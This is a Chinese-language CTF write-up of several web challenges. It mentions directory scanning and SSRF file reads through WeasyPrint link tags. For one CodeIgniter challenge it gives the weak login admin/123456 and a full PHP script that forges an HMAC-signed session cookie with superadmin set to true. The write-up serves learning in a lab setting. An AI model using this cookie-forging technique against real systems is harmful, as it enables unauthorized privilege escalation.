真亦假，假亦真

以为是php，没想到是java，直接扫目录

CSDN_To_PDF V1.2

出题人wp
这所谓的hint感觉就是出题人的脑洞，根本想不到

最近在学web前端，Link标签在html里一般都是用来引入本地的css样式表，WeasyPrint会解析link，从而可以ssrf读本地的任意文件，但是firefox下载的都是这种的，要用edge下，不知道为什么

后面就直接跟出题人wp

BabyCodeIgniter

首先弱密码admin/123456登录，有传文件的功能，但要superamdin，cookie里直接改没用，有hash进行验证
出题人wp，直接用他的php脚本，主要就是得知道靶机这个版本用的加密方法

<?php
$sessid = '';
while (strlen($sessid) < 32)
{
    $sessid .= mt_rand(0, mt_getrandmax());
}
$encryption_key="123456";
$data = array(
    'username' => 'admin',
    'password' => '123456',
    'is_logged_in' => true,
    'session_id'    => md5(uniqid($sessid, TRUE)),
    'ip_address'    => '127.0.0.1',
    'user_agent'    => 'huahua',
    'last_activity'    => time(),
    'superadmin' => true
);

$cookie_data = serialize($data);
$cookie_data .= hash_hmac('sha1',$cookie_data,$encryption_key);
echo urlencode($cookie_data);
?>